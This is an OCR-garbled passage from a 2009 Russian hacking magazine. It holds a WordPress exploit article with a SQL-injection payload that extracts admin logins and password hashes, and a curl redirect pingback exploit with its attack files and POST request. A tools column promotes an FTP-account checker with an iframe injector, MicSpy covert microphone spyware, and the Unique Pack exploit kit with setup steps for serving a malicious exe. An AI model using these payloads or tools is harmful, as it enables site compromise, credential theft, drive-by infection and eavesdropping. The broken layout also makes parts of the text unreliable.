книги хакеры / журнал хакер / 125_Optimized
.pdf
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
P |
|
|
|
|
|
NOW! |
o |
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
>>m |
|
|
|
|
|
|||
w Click |
to |
|
|
|
взлом |
|
|
|
|
|||||
|
|
|
|
|
|
|||||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
|
|
|
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
РЕЗУЛЬТАТВЫПОЛНЕНИЯSQL-ИНЪЕКЦИИВXMLRPC.PHP
ЗЛОПОЛУЧНЫЙCHANGESET ВSNOOPY
<params>
<param><value><string>1</string></
value></param> <param><value><string>[ИМЯ_АВТОРА]</string></value></param> <param><value><string>[ПАРОЛЬ_АВТОРА]</string></value></param> <param><struct>
<member>
<name>name</name>
<value>xxx.gif</value>
</member>
<member>
<name>type</name> <value>gif',(select concat(user_ login,':',user_pass) from wp_users limit 1))/*</value>
</member>
<member>
<name>bits</name> <value>HELLO WORLD!</value> </member>
</struct>
</param>
<param><value><string>77</
string></value></param>
</params></methodCall>
Послеотправкипакетанаблогжертвыпоторописьпройтивадминку: Manage => Uploads. В поле«URL» вслучаеудачногосрабатывания эксплойтатыувидишьхешипарольадмина.
ФОКУСЫСКУРЛОМ
Представляютвоемувниманиюочередную уязвимостьWordPress (найденнуюнебез помощиЭлекта), котораязаключаетсяв
проверкесуществованиялюбогофайлана |
|
true ); |
уязвимомблоге. Подверженывсеверсии |
|
|
|
|
|
движка, начинаяс2.7. Дляначаланужно |
Да-да! Тывидишьтотсамыйфлаг, отвечающий |
|
сказать, чтоэтонесовсемуязвимостьворд- |
заподдержкуредиректа! |
|
пресса, а, скорее, фичаcurl, php-библиотеку |
Дальшеопустимзаумныйкод, носкажулишь, |
|
которогокакразиюзаетWordPress вместо |
чтоподефолту(всеговозможнычетыре |
|
ушедшеговнебытиеSnoopy. Итак, уязвимость |
варианта) вкачестветранспортаhttp-данных |
|
курлазаключаетсявтом, чтоонсрадостью |
вордпрессвыбираеткурл: |
|
можетпрочитатьдлятебянетолькоудален- |
|
|
ныефайлыпоhttp, ноилокальныеспомощью |
|
function wp_remote_get($url, $args |
префикса«file://»! Но, какправило, префиксы |
|
= array()) { |
проверяютсяскриптамиещенавходеи, каза- |
|
$objFetchSite = |
лосьбы, «file://» заюзатьневозможно. Однако |
|
_wp_http_get_object(); |
никтонеподумалотом, чтоcurl поддерживает |
|
return $objFetchSite->get($url, |
переадресациюспомощьюфлага«CURLOPT_ |
|
$args); |
FOLLOWLOCATION». Тоесть, — подставив |
|
} |
курлувполнеобычныйhttp, навыходемы |
|
|
|
|
|
можемполучитьчтениепроизвольного |
2. Функция, приведеннаявыше, используетсяв |
|
локальногофайла(подробноеadvisory отпер- |
./wp-includes/functions.php: |
|
вооткрывателяищивсносках)! Ввордпрессе |
|
|
множествофайловюзаюткласс./wp-includes/ |
|
function wp_remote_fopen( $uri ) { |
http.php, носейчасмырассмотримлишьодин |
|
... |
изнаиболеедоступныхpre-auth способов |
|
$response = wp_remote_get( $uri, |
эксплуатациибаги(найтидругиеспособыв |
|
$options ); |
админке— твоедомашнеезадание:)). |
|
... |
Дляначаларассмотримнекоторыеособенно |
|
} |
важныедляэксплуатациибагакускикодав |
|
|
|
|
|
последнейверсиивордпресса(2.7.1): |
3.И, наконец, этажефункцияиспользуетсяв |
|
1. ./wp-includes/http.php |
ужеполюбившемсятебеинтерфейсеxmlrpc: |
|
|
|
|
class WP_Http_Curl { |
|
function pingback_ping($args) { |
function request($url, |
|
... |
$args = array()) { |
|
|
if ( !ini_get('safe_mode') |
|
$pagelinkedfrom = $args[0]; |
&& !ini_get('open_basedir') ) |
|
|
curl_setopt( $handle, |
|
$pagelinkedto = $args[1]; |
CURLOPT_FOLLOWLOCATION, |
|
... |
|
|
|
070 |
XÀÊÅÐ 05 /125/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
>>
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
взломw |
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
||||
|
|
|
|
|
o |
m |
||||
|
w |
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
ДОМАШНЯЯСТРАНИЦАВОРДПРЕССА
WP_OLD_SLUG, ЗАПИСАННЫЙВБАЗЕ
// Let's check the remote site $linea = wp_remote_fopen
($pagelinkedfrom);
...
Теперьунасестьвсенеобходимоедлянаписанияэксплойта, — кчемумысейчасиприступим.
АБЫЛЛИФАЙЛ?
Кактыужепонял, действоватьмыбудемчерез механизмпингбэков, прокоторыйяуженеоднократнорассказывалвпредыдущихномерах. Дляработынампонадобятсядвафайла, доступныхпоhttp. Например, такие: http://lamer. com/ping1/index.php иhttp://lamer.com/ping2/ index.php.
Предположив, чтоадреснашегоблога— lamer. com/blog ичтотестовымстендомявляетсяВинда, начнемработунаднеобходимымифайлами:
1. ./ping1/index.php
<?php
header("<title>Exploit</ title><a href="http://lamer.com/ ping2/?p=1#lamer.com/blog">Curl</ a>");
header("Location: file:///c:\boot.
ini", 302); ?>
2. ./ping2/index.php
<a href="http://lamer.com/ ping1/?p=2">Ping2</a>
Вэтомпримерепервыйфайлсможетпропинговатьвторой, благодаряещеоднойнедоработке вордпресса. Смотривмеханизмпинговxmlrpc. php:
// Check if the page linked to is in our site
$pos1 = strpos($pagelinkedto, str_replace(array('http:// www.','http://','https:// www.','https://'), '', get_ option('home')));
if( !$pos1 )
return new IXR_Error(0, __ ('Is there no link to us?'));
Вэтойпроверкевовсененужно, чтобывторой пингуемыйсайтобязательнобылтекущимблогом, таккакмыможемобойтипроверку, вставив адресэтогосамогоблога. Например, вконце URL послерешетки.
Всеготоводляпроверкиналичияфайлаc:\ boot.ini натестируемойсистеме.
Дляэксплуатацииуязвимоститебенеобходи- молишьпослатьследующийPOST-пакетдля сервераxmlrpc:
<methodCall>
<methodName>pingback.ping</
methodName>
<params>
<param><value><string>http://
lamer.com/ping1/?p=2</string></
value></param>
<param><value><string>http:// lamer.com/ping2/?p=[ИД_СУЩЕСТВУЮЩЕГО_ПОСТА_НА_БЛОГЕ]#lamer.com/ blog</string></value></param> </params>
</methodCall>
Послеотсылкипакетатысможешьполучить дваответаотсервера:
1. Еслифайлc:\boot.ini существует, тоблог пришлеттакойответ—
Pingback from http://lamer.com/ ping1/?p=2 to http://lamer. com/ping2/?p=1#lamer.com/blog registered. Keep the web talking! :-)
2.Еслитакогофайланет, тождитакогоответа—
The source URL does not exist.
Кстати, этимспособомбылобывполневозможнопрочитатьсодержимоелюбогофайла системы, еслибыпингбэкнеурезалсядоочень
малогоколичествасимволов. Такчто, вком- ментарии-пингбэкетыувидишьлишьчто-то вроде:
[...] Server: Apache/2.2.4 (Win32) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.4 X-Powered-By: PHP/5.2.4 popa: 111 Location: file:///c:boot. ini Content-Length: 0 Connection: close Content-Type: text/html; [...]
Содержимоеc:\boot.ini остаетсягде-топод катом:). Описанный способ эксплуатации уязвимостинеявляетсяединственным.
В админке ты сможешь найти и другие вызовы функции wp_get_http(), которые позволят тебе читать файлы на системе. Найти их — уже твоя задача.
TO BE CONTINUED...
Нучто, тывсеещесчитаешьWordPress безопаснымдвижком?
Незабывай: злостныекодокопателиежедневновдольипоперекмучаютWordPress codebase. Какговорится, «Продолжение следует...» :)! z
XÀÊÅÐ 04 /124/ 09 |
071 |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
|
|
P |
|
|
|
|
|
NOW! |
o |
|
||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
>>m |
|
|||
w Click |
to |
|
|
|
взлом |
|||||
|
|
|
|
|||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
ЛЕОНИД «R0ID» СТРОЙКОВ
/ R0ID@BK.RU /
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
>> взлом
Программы для хакеров
|
|
|
|
|
|
|
|
ПРОГРАММА: |
FTP-TOOLZ |
рами (PR/страна) |
|||||
ОС: |
*NIX/WIN |
|
|
— Возможность сортировки акков по |
|||
АВТОР: |
JEN |
|
|
hostname |
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Чекерподдерживаетстандартныйвидакка- |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
унтов: |
|
|
|
|
|
|
|
|
FTP-чекерновогопоколения:)
Потребностьвработоспособныхftp-чекерах естьвсегда. Именнопоэтомуяужепредставлял твоемувниманиюнесколькоинтересныхпродуктов. Асегодняхочупорадоватьещеодной достойнойтулзой— FTP-Toolz. Этомощный инструментдляработысфтп-акками, накоденныйнаPHP. Описыватьвсепреимущества чекера— делонеблагодарное, поэтомукоротко перечислюлишьосновныевозможности:
•Аплоад файлов через веб-интерфейс
•Чекер ftp-акков на валидность
•Встроенный ифраймер (добавление кода в начало/конец файла)
•Поиск и удаление чужих iframe-вставок
•run-time статистика
•Удобочитаемые логи
•Поддержка продолжения чека (то есть, если скрипт не закончил проверку, то при следующем запуске чекер начнет работать только с теми акками, которые не успел прочекать)
•Отчистка ftp-листа при импорте (удаление анонимных акааунтов)
•Встроенный парсер валидных/невалидных акков
•Наличие полноценной статистики за весь период работы скрипта
•Возможность остановки чекера и всех его запущенных копий, путем создания в папке с чекером файла «stop»
Крометого, всоставчекеравходитфункциональныйпарсер, спомощьюкотороготыбез трудасможешьотсортироватьфтп-аккипо заданнымпараметрам:
•Выборка акков по странам
•Выборка акков по Google PageRank (PR)
•Возможность проверки указанного числа аккаунтов с заданными парамет-
—ftp://login:pass@server
—login:pass@server
Сустановкойтулзыпроблемвозникнутьне должно. Тебепотребуетсязалитьсодержимое архиванасвой(илинесовсемсвой:)) сервер, установитьправаназаписьдлякаталога./ ftp_tools/upload, создатьновуюБДиотредак-
тироватьконфигmysql_config.php:
<?php
$db_host = "localhost";
# õîñò
$db_user = "root"; # þçåð ÁÄ $db_passwd = "root"; # пароль $db_name = "ftps"; # название БД ?>
Послеэтогоможешьсмелоприступатьк процессуинсталлаполинкуhttp://твой_хост/ ftp_tools/install.php.
Да, инезабудьдобавитьбазуGeoIP всоответс-
твующийкаталог./ftp_tools/seller_tool/GeoIP. dat. ДляработыутилыпотребуетсяPHP => 4.0.3 версиисотключеннымSafe_Mode, атакже MySQL любойверсии.
ПРОГРАММА:MICSPY
ОС:WINDOWS2000/XP АВТОР:SLESH
Утебяникогданевозникаложеланияподслушатьчужойразговор? Всесдетствазнают, что подслушиватьнехорошо, ноеслиоченьхочется
— выходесть! Нет, мынебудемваятьмодный жучокилиподключатьсяктелефоннойлинии. На этотразмыпростовоспользуемсямикрофоном, правда, чужим:). АпоможетвэтомутилаMicSpy отSLESH'а. Тулзапоканастадиитестированияи распространяетсявбета-версии, однакобольше всегонасинтересуетсамаидеяисорцы. Смысл работытулзызаключаетсявскрытойзаписи звукаприпомощисоответствующегодефолтовогоустройствавсистеме, коимможетявляться,
СорцыMicSpy by SLESH
например, внешнийиливстроенныймикрофон. Привключенномкомпежертвымыможем запростописатьвсеразговорыврадиуседосягаемости(зависит, впервуюочередь, откачества микрофона). Размерутилынемногимпревышает 7 Кб. Приэтомфункционалприятноудивляет:
•Данные записываются в аудио-файл формата .mp3, 24 КГц 32кбит/с, моно
•Для записи используется стандартный виндовый кодек MPEG LAYER-3
•Название каждого файла с записью указывается в виде: год_месяц_день_ час-минуты-секунды.mp3
•Наличие админки, которая по дефолту поднимается на порту 4545
Теперьнемногообадминке. Спомощьюпанели управлениятыможешь:
•Начинать/останавливать запись
•Просматривать листинг записанных файлов, получать размер каждого и т.п.
•Удалять записанные файлы
•Скачивать записанные файлы
P.S. В архиве с утилой лежат и сорцы: MicSpy.dpr — основная часть тулзы, включая реализацию админки
API.pas — константы, типы и функции MicRec.pas — функции записи
Cловом, приналичиипрямыхрукоткрывается широкийпростордляфантазии. Использовать подобнуюидеюможновразныхнаправлениях (обязательноблагих:)). Такчто— дружноговорим«спасибо» SLESH'уиидемвникатьвсорцы.
072 |
XÀÊÅÐ 05 /125/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
|
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
>> взломw Click |
|
BUY |
|
|
|||||||||||
w Click |
to |
|
|
|
|
|
m |
|
to |
|
|
|
|
|
m |
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
// таблица с логированием атак |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ПРОГРАММА:WEBSECURITYSYSTEM |
$TableCache |
= "cache"; |
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
ОС:*NIX/WIN |
// таблица с информацией об |
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
АВТОР: AVADANEIANDREI |
атакующих |
|
|
|
|
|
|
|
|
|
|
|
|
Впоследнеевремяширокоераспространение |
|
|
|
|
|
?> |
получилиразнообразныедетекторыатак, ло- |
|
|
|
|
|
|
гирующиевседействиязлоумышленника. Яже |
КонфигурируемсистемубезопасностиWSS |
Смелозаливайсофтинунасвойсерверипри- |
||||
хочуобратитьтвоевниманиенанесколькоиной |
|
|
|
|
|
ступайкконфигурации. Ипомни, безопасности |
продукт— Web Security System — предназначен- |
ssage]) — отправка сообщения атакую- |
многонебывает. |
||||
ныйдлязащитыотXSS, SQL-injection, RFI-атак. |
щему при обнаружении атаки |
|
|
|||
Поверь, этонепустыеслова! Системареально |
• SetPatchVars([$value]) — определе- |
ПРОГРАММА:UNIQUEPACKV.1.1 |
||||
работает(разумеется, приграмотнойнастройке |
ние действий в случае атаки |
ОС:*NIX/WIN |
||||
:)). Изпреимуществпродуктастоитотметить: |
|
|
|
|
|
|
|
• private $ProtectionLevel |
= 7; |
|
|||
• Быстрая работа с PHP-файлами |
// Protection level |
|
|
|
||
• Быстрое обнаружение уязвимостей и |
• private $WarningLevel |
|
= 3; |
|
||
их устранение |
// Warning level |
|
|
|
|
|
• Логирование всех атак в БД |
• private $MysqlID |
= -1; |
|
|||
|
// Mysql Connection ID |
|
|
|
||
Админкасистемыпозволяет: |
• private $ShowMessage |
= TRUE; |
|
|||
|
// If we detect something we show an |
КонфигUnique Pack |
||||
• Просматривать IP-адреса атакующих |
message |
|
|
|
|
|
• Получать информацию о типах атак |
• private $EventMessage |
|
= "Acces |
Кактыужезнаешь,найтихорошуюсвязкувпабли- |
||
• Просматривать все логи по конкрет- |
Violation!"; |
// Message show |
ке—задачанепростая.Ярешилподелитьсяодной |
|||
ному IP-адресу атакующего |
in case of attack detection |
изприватныхверсийсвязкиUniquePackv.1.1.Она |
||||
|
• private $PatchVars |
= |
|
ужевовсюгуляетпополуприватуивнедалекомбу- |
||
Крометого, всофтинереализованапроверка |
TRUE; |
|
// Patch value |
дущемокажетсявпаблике,такчтосчитайподарок |
||
глобальныхпеременных: |
from detected problems |
|
|
неболеечемтестовымпродуктомпередпокупкой |
||
|
• private $FollowAttacker |
= TRUE; |
лицензионнойверсии.Чтоизменилосьврелизе: |
|||
• $_GET |
// Store all information about |
|
||||
• $_POST |
attacker from now on |
|
|
• Изменена выдача PDF-файла (кроме |
||
• $_SERVER |
• private $ExistThreads |
|
= FALSE; |
самого сплойта, генерируется PDF- |
||
• $_SESSION |
// Security Threads |
|
|
файл с рандомными значениями) |
||
• $_COOKIE |
• private $SecurityThreads |
= |
• Обновлен PDF-сплойт (теперь ис- |
|||
|
array(array(array())); |
|
// Store |
пользуется Double PDF новой и старой |
||
Вкачествепеременныхдля$_SERVER исполь- |
threads if exists |
|
|
версии совместно) |
||
зуются: |
• private $SystemVersion |
|
= "1.4"; |
• Изменен метод шифрования сплойтов |
||
|
// System Version |
|
|
|
|
|
"HTTP_ACCEPT", "HTTP_ACCEPT_ |
• private $SystemUpdateLink = ""; |
Установитьсвязкунесложно: |
||||
CHARSET", "HTTP_ACCEPT_ENCODING", |
// Hold update link |
|
|
|
||
"HTTP_ACCEPT_LANGUAGE", "HTTP_ |
• private $SystemUpdateVers = ""; |
• Заливаем файлы на абузный сервер |
||||
CONNECTION", "HTTP_HOST", "HTTP_ |
// Hold update version |
|
|
• Заливаем свой exe'шник в папку со |
||
REFERER", ”HTTP_USER_AGENT", |
• private $ExceptionVars |
|
= |
связкой с названием 1.exe |
||
"SERVER_ADMIN", "SERVER_PORT", |
array(); |
|
// Hold |
• Создаем базу данных |
||
"SERVER_SIGNATURE", "PHP_AUTH_ |
special checks vars |
|
|
• Открываем файл config.php и вписы- |
||
DIGEST", "PHP_AUTH_USER", "PHP_ |
|
|
|
|
|
ваем данные базы, полный линк до pdf. |
AUTH_PW", "AUTH_TYPE". |
Нуасамконфигconfig.php выглядитдостаточно |
php и полный линк до load.php, а также |
||||
|
просто: |
|
|
|
|
логин/пароль на доступ к статистике |
Помимоконфига, которыйрасполагаетсяв |
|
|
|
|
|
• Вбиваем в браузере адрес http:// |
файлеconfig.php, настоятельнорекомендую |
<?php |
|
|
|
|
наш_сайт/spl/_install.php и запус- |
изучитьсодержимоескриптаprt_system.php, |
$user = "Andrei"; //логин админа |
каем инсталл |
||||
ибовнемсосредоточеныосновныенастройки |
$pass = "wss"; //пасс админа |
• После надписи "Installation |
||||
ифункциисистемы: |
// данные для подключения к СУБД |
finished Please delete install.php" |
||||
|
$connection = array("server" => |
удаляем _install.php |
||||
• RunPSystem() — основные функции |
"localhost", |
|
|
|
|
|
для запуска сканирования системы |
"user" |
=> "root", |
|
|
Испокойнонаблюдаемстатупозагрузкам: |
|
• SetScanZone($which,$value) — èñ- |
"pass" |
=> "", |
|
|
|
|
пользуется при сканировании глобаль- |
"database" => "wss"); |
|
|
http://íàø_ñàéò/spl/admcp.php |
||
ных переменных |
//WARNING !! if you edit settings |
|
||||
• SetNoneProtection() — определяет |
bellow you must edit settings from |
Атрафикнаправляемвотнаэтотлинк: |
||||
уровень защиты (1 — минимальный) |
the prt_system.php file.. |
|
|
|||
• SetAllProtection() — устанавливает |
$TablePrefix |
= "prt_sys_"; |
http://íàø_ñàéò/spl/index.php |
|||
высший уровень защиты — 7 |
// префикс таблиц |
|
|
|
||
• SetWarningLevel([$level]) — îïðå- |
$TableMain |
= "main"; |
|
P.S.Поверь, лицензионнаяверсиясвязкистоит |
||
деляет уровень предупреждений |
// основная таблицы |
|
|
своихденег, аналичиеподдержкииапдейтов |
||
• SetMessageToAttacker([$show],[$me |
$TableAttackers |
= "attackers"; |
окупитприобретениевсамыекороткиесроки. z |
|||
XÀÊÅÐ 05 /125/ 09 |
|
|
|
|
|
073 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|||
|
|
X |
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
||
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
r |
|
P |
|
|
|
|
|
NOW! |
o |
||
|
|
|
|
|
|
||||
w Click |
|
BUY |
>>m |
||||||
to |
|
|
|
||||||
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
. |
|
|
|
|
|
.c |
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
||
|
|
|
|
-xcha |
|
|
|
сцена
|
Gold |
- |
|
E |
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
E-Gold
МАРИЯ «MIFRILL» НЕФЕДОВА
/ MIFRILL@RIDDICK.RU /
ОСТАТКИ БЫЛОЙРОСКОШИ
МедленнаясмертьсистемыE-Gold
WebMoney, PayPal, Яндекс.Деньги, Moneybookers… итакдалее, далее, далее. Платежныхсистемвинтернете насчитываетсявеликоемножество. ОднипопулярнынаЗападе, другиенаВостоке, третьипытаютсяусидетьнадвух стульяхсразу. Ещесравнительнонедавнониодинсписокэлектронныхплатежныхсервисовнеобошелсябыбез имениE-Gold. Носегодняэтоназваниесталочутьлинесинонимомслова«кидалово». Хочешьзнать, почемупопулярнейшаясистемапришлавстольплачевноесостояние, аееруководствоедванеугодилозарешетку?
ЭКСКУРС В ИСТОРИЮ Предмет |
Казалосьбы, преуспевающийврач, нистого |
ужев1996-мгоду, впочтисвободнойтогда |
нашегосегодняшнегоинтереса— E-Gold — |
ниссегоударившийсявэлектроннуюком- |
нишерынка. Результатнезаставилсебя |
можетпоправугордитьсянетолькобылым |
мерцию, окоторойтогданиктоещетолкомне |
ждать. Джексондействительнонеошибся— |
статусомоднойизкрупнейшихинаиболее |
помышлял— этовесьмастранно. Ножизнь |
ужев1998-монбылвынужденотказатьсяот |
популярныхплатежныхсистем, ноипочет- |
полнасюрпризов. Деловтом, чтоДжексон |
продолжениямедицинскойдеятельностив |
нымзваниемоднойизстарейшихизних. |
всегдабылнеравнодушенкфинансам, а, |
пользустремительнонабирающейобороты |
Придумали«электронноезолото» насамой |
занявшисьсобственнымбизнесом, ушелв |
компанииGold & Silver Reserve (G&SR) Inc. |
зареинтернета— в1996 году, исделалиэто |
нихсголовой. Онпредпочиталзнать, счем |
ДугласпередалсвоюдолювFlorida Oncology |
двавесьмадалекихотвсякой«компьютер- |
имеетделои«какэтоработает». Ив1995-м |
партнерамиполностьюсосредоточилсяна |
щины» человека— ДугласДжексон(Douglas |
унегородиласьидеяосозданииудаленной |
новойработе. |
Jackson) иБарриДауни(Barry K. Downey). |
платежнойсистемы, которойнетребовался |
СоучредителемG&SR ипартнеромДжексона |
«Папа» E-Gold (ДугласДжексон) поспеци- |
быпромежуточныйфинансовыйинститут. |
сталБарриДауни— юристпообразованию, |
альности— врач-онколог, притомнекогда |
КтакимразмышлениямдоктораДжексона |
тожевполнеуспешныйвсвоемделе. Специ- |
весьмауспешный. Всвоевремяоннетолько |
подтолкнулочастноеисследованиеоденеж- |
алиствобластиправа, успевшийпобывать |
получилвысшеемедицинскоеобразованиеи |
номвлияниинакредитныйипромышленный |
членомамериканскогоВерховногосуда, а |
успелпослужитьсвоейстраневрядахармии |
цикл. |
такжеавторисоавторрядаюридическихтру- |
США, нопослеслужбыпродолжилкарьеру, |
Поняв, чтонарукахунего— готовая, ра- |
дов, сготовностьюприсоединилсякмедику, |
возглавивотделениерадиационнойонко- |
ботающаясхемаинежелаяоткладывать |
взваливнасебядолжностисекретаря, вице- |
логииврегиональноммедицинскомцентре |
реализациюпридуманногонаабстрактное |
президентаидиректоракомпании. |
Мельбурна(штатФлорида). Анемногимпоз- |
«потом», Джексондовольнобыстросумел |
|
жеивовсеоткрылчастнуюклиникуFlorida |
найтисредстваивозможностидлявопло- |
ЗОЛОТОЙ ФОНД Поравкратцерас- |
Oncology. |
щениясвоейидеивжизнь. E-Gold заработал |
сказатьопринципахработыE-Gold. Вполне |
074 |
XÀÊÅÐ 05 /125/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
